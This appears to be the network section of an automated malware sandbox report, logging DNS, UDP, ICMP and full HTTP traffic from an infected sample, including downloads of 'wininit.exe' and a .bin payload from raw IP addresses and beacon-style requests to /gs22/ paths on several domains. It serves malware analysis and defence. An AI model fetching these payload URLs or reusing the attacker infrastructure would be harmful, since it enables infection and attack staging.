Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.mezcalrosario.com |
CNAME
mezcalrosario.com
|
89.117.139.56 |
www.w2w37.com | 192.74.228.114 | |
www.swastiktradingkota.com | ||
www.appleidco.com |
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:59005 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.101:53004
-
GET
200
http://103.6.248.9/T018W/wininit.exe
REQUEST
RESPONSE
BODY
GET /T018W/wininit.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: 103.6.248.9
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 01:23:01 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Wed, 02 Aug 2023 07:42:07 GMT
ETag: "50eb8-601ebccf6c2a9"
Accept-Ranges: bytes
Content-Length: 331448
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://23.95.60.83/rft/PiNqnEquXXipiHilYV223.bin
REQUEST
RESPONSE
BODY
GET /rft/PiNqnEquXXipiHilYV223.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 23.95.60.83
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 01:23:26 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Wed, 02 Aug 2023 07:38:29 GMT
ETag: "2e440-601ebbff90f28"
Accept-Ranges: bytes
Content-Length: 189504
Content-Type: application/octet-stream
GET
301
http://www.mezcalrosario.com/gs22/?x4ahHtwP=9vqGyEwSjFJ65F5HfUu0nj0baUEVEMWVa2VMtqXoJwbLaSy1AFIaNUZVE0qALa569XCftmAp&9r=gdidSh0H
REQUEST
RESPONSE
BODY
GET /gs22/?x4ahHtwP=9vqGyEwSjFJ65F5HfUu0nj0baUEVEMWVa2VMtqXoJwbLaSy1AFIaNUZVE0qALa569XCftmAp&9r=gdidSh0H HTTP/1.1
Host: www.mezcalrosario.com
Connection: close
HTTP/1.1 301 Moved Permanently
Connection: close
content-type: text/html
content-length: 707
date: Thu, 03 Aug 2023 01:24:19 GMT
server: LiteSpeed
location: https://www.mezcalrosario.com/gs22/?x4ahHtwP=9vqGyEwSjFJ65F5HfUu0nj0baUEVEMWVa2VMtqXoJwbLaSy1AFIaNUZVE0qALa569XCftmAp&9r=gdidSh0H
platform: hostinger
content-security-policy: upgrade-insecure-requests
GET
0
http://www.w2w37.com/gs22/?x4ahHtwP=sxpFiT/QnuwqbREFEalc4xGkI+X15UMLgBOmnpWdTi7yXahnG8Uo0ChTsXgqiqTJ7vwSjSB2&9r=gdidSh0H
REQUEST
RESPONSE
BODY
GET /gs22/?x4ahHtwP=sxpFiT/QnuwqbREFEalc4xGkI+X15UMLgBOmnpWdTi7yXahnG8Uo0ChTsXgqiqTJ7vwSjSB2&9r=gdidSh0H HTTP/1.1
Host: www.w2w37.com
Connection: close
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 | |
192.168.56.101 | 164.124.101.2 | 3 | |
192.168.56.101 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts